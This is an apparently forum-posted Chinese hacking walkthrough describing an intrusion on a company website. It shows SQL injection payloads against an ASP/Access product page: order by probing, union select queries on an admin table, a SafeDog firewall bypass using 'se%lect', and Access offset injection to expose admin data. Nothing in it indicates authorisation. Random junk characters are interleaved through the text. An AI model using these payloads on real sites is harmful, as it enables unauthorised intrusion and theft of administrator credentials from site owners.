打开网站,一个企业站。
- c0 J1 K. @. n$ ]5 k' P" x% \/ @* |! n
3 I E6 O7 l7 Q0 L顺手加个admin+ V7 p; |. B& t; V
; Z E' g% B* R8 d
, c: ` e6 }1 ] X9 Q, b7 R默认后台。. x3 X6 o. P2 a
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。8 K3 F6 H8 Y6 T Q
3 Y7 G1 H' I# w7 i. Z9 O# P& g' I
* b) T6 r6 e# c! g
; ~4 _! X j" [所以就不用御剑扫了,待会直接封IP。
# U. x! j4 L* n" Q& }4 K
/ v, c% h! A! A* ^$ l0 z用order by语句判断是否存在注入。
+ S2 @9 Y5 G5 c( G" ^( dhttp://www.xxx.com /product_show.asp?id=997 order by 1
9 V! r- y; P0 F+ [/ L" i1 N/ Mhttp://www.xxx.com /product_show.asp?id=997 order by 100: P: {! ]6 i" c/ r
现在存在注入,经测试后发现是9个字段。2 n$ O3 a; F4 Y" _
- ^8 R. c b4 Z, E B接下来进行联合查询,猜是否存在admin表。; b+ r$ P# u9 Q: J
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
: ]) y$ |4 F; a( D, ?$ w$ ?& U2 `7 `& r2 r4 e" a# L
9 Y# g: E% T* M% Z, }
* R9 G$ T2 Z; }' m: @在select中间加个%,se%lect绕过安全狗。
& g3 I$ C3 o; V8 O) A
4 o C1 n3 u8 g! v2 s9 X& d4 w: E. s0 {$ ?
发现存在admin表,然后开始手工猜常用的字段。, B0 s. q' f: w2 K
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。, a( a T- B- P
6 z* N6 w0 P5 { H, t1 u# [突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。- v6 [) h7 M) b& ?, I7 f
+ A l$ v; G& O- v3 r8 l d
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
4 E9 a# u' _+ {- thttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
2 c- X1 n. }" x, @6 [" {好了,敏感内容出显了。
0 M2 E8 D2 t S4 T2 z
, t# f) a8 C' s6 z" z9 ?7 {% b+ D" f- A" L
4 q. ~8 q: ]: k ]+ o8 E+ M! O5 F% a |